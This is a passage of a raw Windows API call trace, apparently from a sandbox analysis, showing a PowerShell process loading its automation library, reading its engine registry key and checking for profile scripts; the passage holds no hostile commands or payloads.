	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetLastError () returned 0xcb
	[0230.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.618] GetLastError () returned 0xcb
	[0230.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.618] GetLastError () returned 0xcb
	[0230.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.619] GetLastError () returned 0xcb
	[0230.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.619] GetLastError () returned 0xcb
	[0230.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.644] GetLastError () returned 0xcb
	[0230.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.644] GetLastError () returned 0xcb
	[0230.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.644] GetLastError () returned 0xcb
	[0230.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.644] GetLastError () returned 0xcb
	[0230.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.645] GetLastError () returned 0xcb
	[0230.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.645] GetLastError () returned 0xcb
	[0230.645] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.647] GetLastError () returned 0xcb
	[0230.654] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.805] GetLastError () returned 0xcb
	[0230.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.807] GetLastError () returned 0xcb
	[0230.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.810] GetLastError () returned 0xcb
	[0230.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.817] GetLastError () returned 0xcb
	[0230.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.900] GetLastError () returned 0xcb
	[0230.908] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.910] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0231.118] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0231.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.126] GetLastError () returned 0xcb
	[0231.546] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x770918
	[0231.546] GetLastError () returned 0x0
	[0231.548] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7709a0
	[0231.548] GetLastError () returned 0x0
	[0231.947] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.335] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.336] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.337] VirtualQuery (in: lpAddress=0x29c354, lpBuffer=0x29d354, dwLength=0x1c | out: lpBuffer=0x29d354*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.357] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.358] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.359] VirtualQuery (in: lpAddress=0x29cca0, lpBuffer=0x29dca0, dwLength=0x1c | out: lpBuffer=0x29dca0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.369] GetLastError () returned 0xcb
	[0232.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.369] GetLastError () returned 0xcb
	[0232.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.369] GetLastError () returned 0xcb
	[0232.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.370] GetLastError () returned 0xcb
	[0232.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.370] GetLastError () returned 0xcb
	[0232.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.708] GetLastError () returned 0xcb
	[0232.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.708] GetLastError () returned 0xcb
	[0232.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.708] GetLastError () returned 0xcb
	[0232.708] VirtualQuery (in: lpAddress=0x29cfc8, lpBuffer=0x29dfc8, dwLength=0x1c | out: lpBuffer=0x29dfc8*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.710] GetLastError () returned 0xcb
	[0232.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.710] GetLastError () returned 0xcb
	[0232.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29da4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.710] GetLastError () returned 0xcb
	[0232.710] VirtualQuery (in: lpAddress=0x29cfc0, lpBuffer=0x29dfc0, dwLength=0x1c | out: lpBuffer=0x29dfc0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.710] VirtualQuery (in: lpAddress=0x29cc74, lpBuffer=0x29dc74, dwLength=0x1c | out: lpBuffer=0x29dc74*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.710] VirtualQuery (in: lpAddress=0x29cc74, lpBuffer=0x29dc74, dwLength=0x1c | out: lpBuffer=0x29dc74*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0232.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e6fc | out: phkResult=0x29e6fc*=0x3b8) returned 0x0
	[0232.713] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e744, lpData=0x0, lpcbData=0x29e740*=0x0 | out: lpType=0x29e744*=0x1, lpData=0x0, lpcbData=0x29e740*=0x56) returned 0x0
	[0232.713] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e744, lpData=0x7a4288, lpcbData=0x29e740*=0x56 | out: lpType=0x29e744*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e740*=0x56) returned 0x0
	[0232.713] RegCloseKey (hKey=0x3b8) returned 0x0
	[0232.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e6fc | out: phkResult=0x29e6fc*=0x3b8) returned 0x0
	[0232.713] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e744, lpData=0x0, lpcbData=0x29e740*=0x0 | out: lpType=0x29e744*=0x1, lpData=0x0, lpcbData=0x29e740*=0x56) returned 0x0
	[0232.713] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e744, lpData=0x7a4288, lpcbData=0x29e740*=0x56 | out: lpType=0x29e744*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e740*=0x56) returned 0x0
	[0232.714] RegCloseKey (hKey=0x3b8) returned 0x0
	[0232.723] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x7a4288 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0232.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0232.725] GetLastError () returned 0x3f0
	[0232.725] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x7a4288 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0232.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0232.725] GetLastError () returned 0x3f0
	[0232.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x29e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0232.726] GetLastError () returned 0x3f0
	[0232.726] SetErrorMode (uMode=0x1) returned 0x1
	[0232.727] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x29e7ac | out: lpFileInformation=0x29e7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0232.727] GetLastError () returned 0x2
	[0232.727] SetErrorMode (uMode=0x1) returned 0x1
	[0232.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x29e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0232.727] GetLastError () returned 0x2
	[0232.727] SetErrorMode (uMode=0x1) returned 0x1
